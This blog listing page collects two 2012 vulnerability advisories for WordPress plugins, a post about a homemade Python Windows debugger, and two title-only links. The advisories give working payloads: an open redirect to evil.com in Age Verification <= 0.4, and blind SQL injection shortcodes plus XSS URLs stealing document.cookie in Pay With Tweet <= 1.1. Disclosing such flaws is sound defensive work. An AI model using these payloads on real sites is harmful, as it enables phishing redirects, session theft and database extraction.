Welcome to Cloudberry Engineering
a notebook on building, breaking and securing systems by Gianluca Brindisi. 
  • # Exploit Title: WordPress Age Verification plugin <= 0.4 Open Redirect
# Date: 2012/01/10
# Dork: inurl:wp-content/plugins/age-verification/age-verification.php
# Author: Gianluca Brindisi (g@brindi.si @gbrindisi http://brindi.si/g/)
# Software Link: http://downloads.wordpress.org/plugin/age-verification.zip
# Version: 0.4

    1. Via GET: http://server/wp-content/plugins/age-verification/age-verification.php?redirect_to=http%3A%2F%2Fwww.evil.com The rendered page will provide a link to http://www.evil.com

    2. Via POST: http://server/wp-content/plugins/age-verification/age-verification.php redirect_to: http://www.evil.com age_day: 1 age_month: 1 age_year: 1970 Direct redirect to http://www.evil.com

    # / #wordpress #advisory #open-redirect 
  • # Exploit Title: WordPress Pay With Tweet plugin <= 1.1 Multiple Vulnerabilities
# Date: 01/06/2012
# Author: Gianluca Brindisi (g@brindi.si @gbrindisi http://brindi.si/g/)
# Software Link: http://downloads.wordpress.org/plugin/pay-with-tweet.1.1.zip
# Version: 1.1

    1) Blind SQL Injection in shortcode:

    Short code parameter ‘id’ is prone to blind sqli, you need to be able to write a post/page to exploit this:

    [paywithtweet id="1' AND 1=2"]
[paywithtweet id="1' AND 1=1"]

    2) Multiple XSS in pay.php

    http://target.com/wp-content/plugins/pay-with-tweet.php/pay.php

    After connecting to twitter:

    ?link=&22></input>[XSS]

    After submitting the tweet:

    ?title=[XSS]&dl=[REDIRECT-TO-URL]')")[XSS]

    The final download link will be replaced with [REDIRECT-TO-URL]

    POC: pay.php?link=%22></input><script>alert(document.cookie)</script>&title=<script>alert(document.cookie)</script>&dl=http://brindi.si%27"<script>alert(document.cookie)</script>

    # / #wordpress #advisory #sql-injection #xss

  • Simple Debugger (sdbg) is a minimal Windows debugger I wrote to sharpen my knowledge of debugging practices.

    It’s written in python and it’s obviously coded on top of the wonderful ctypes library. The overall architecture is heavily based on PyDbg since I was already familiar.

    At the moment of this writing it’s capable of setting soft, hard and memory breakpoints, it has a minimal interactive shell to retrieve registers status and it’s expandable with custom callbacks for handling exceptions.

    Building a debugger it’s been an awesome experience (except for the parts where I am swearing on the IA32 Intel docs) and I really learned a lot - and this was the main goal.

    Since I am starting to wet my feet in reverse engineering I am looking to eat my own dogfood and use it for analysing some samples from my malware collection. This way I hope to keep it updated and maybe add some new features too.

    As usual everything is GPLd and you can find it on my bitbucket page.

    # / #python #debugging #reverse-engineering
  • Introducing xsssniper
  • Tor + Polipo on OpenBSD